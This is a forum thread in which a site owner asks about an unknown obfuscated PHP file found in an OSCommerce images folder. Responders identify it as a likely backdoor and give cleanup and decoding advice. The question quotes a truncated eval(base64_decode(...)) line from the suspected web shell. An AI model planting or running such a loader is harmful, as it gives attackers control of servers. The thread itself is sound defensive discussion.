CODEWITHSUNDEEP
phpsecurity
Brad
Brad

Reputation: 1369

Unexpected PHP file showed up in OSCommerce

Was digging through the OSCommerce files on my site and found a file in the /images folder that I don't ever remember seeing before. I haven't checked the original install package, but I suspect this isn't a part of it.

The file is 27kb and called vidovic_pretty.php. It's encoded or compiled in some way, so the contents are unviewable. (see below)

<?eval(base64_decode("JGs9MTQzOyRtPWV4cGxvZGUoIjsiLCIyMzQ7MjUzOzI1MzsyMjQ7MjUzOzIwODsyNTM7MjM0OzI1NTsyMjQ7MjUzOzI1MTsyMzA7MjI1OzIzMjsxNjc7...

Running it displays a single html textbox and a button that says, "Check."

Anyone have any ideas what it is or what it might do?

Thanks

Upvotes: 1

Views: 350

Answers (5)

Don
Don

Reputation: 4673

In my PHP framework, I do not allow files to be uploaded that apache might know how to execute upon retrieval.

If you must print out a thing like this, do it in a CLI version of PHP, don't send it to your browser! It might also include something that our browser will execute.

Upvotes: 0

code_burgar
code_burgar

Reputation: 12323

Definitely a baddie you got there. As others have pointed out, it most probably serves as a nice backdoor for the attacker to run arbitrary commands on your system.

What you should, at a bare minimum, do is:

  • Notify your tech support and ask for them to find out what the attacker changed and when
  • If you are on a shared host, move to a dedicated server (or at least a VPS)
  • Back up your data, verifying it's clean in the process
  • Roll back to a backup made before the box has been compromised
  • Apply any and all security patches to the software you have been running, the OS, etc.
  • Reinstall your scripts then re-import the clean data

Upvotes: 1

rook
rook

Reputation: 67039

I have absolutely no doubt in my mind that you have been hacked. You have discovered a backdoor and you must remove it immediately. These are often put in place by automated attack systems and then a hacker can come back at a later date and assume control over your server or use your server to break into web browsers that visit it. I have cleaned up hacks identical to this before. I'm surprised you aren't on google's walware list, that is usually peoples first indication.

I really want to find out the PHP code that is being eval'ed. Can you post the full base64? Maybe split it up by newlines so it will fit.

Upvotes: 0

Max Shawabkeh
Max Shawabkeh

Reputation: 38643

This is most likely something a hacker injected - encoded and minimized. You can echo the result of base64_decode(...) instead of evaluating it to see what it would try to perform. BTW, actually running it was probably a big mistake.

Upvotes: 4

mr-sk
mr-sk

Reputation: 13417

If you can provide the entire string within the base64_decode - Or, actually, instead of calling eval, call echo:

<?echo base64_decode("JGs9M...");

You'll be able to see what it does. But, typically, this is a signature of a backdoor/attacker, etc. I've seen this style before. And the fact its in the images/ directory maybe means they were able to get something like photo.gif.php uploaded ...

Probably not good at all.

Running it displays a single html textbox and a button that says, "Check."

Does it post to a page? Maybe the page receives whatever is in the textbox and executes it via system(), exec(), etc....

Upvotes: 2

Related Questions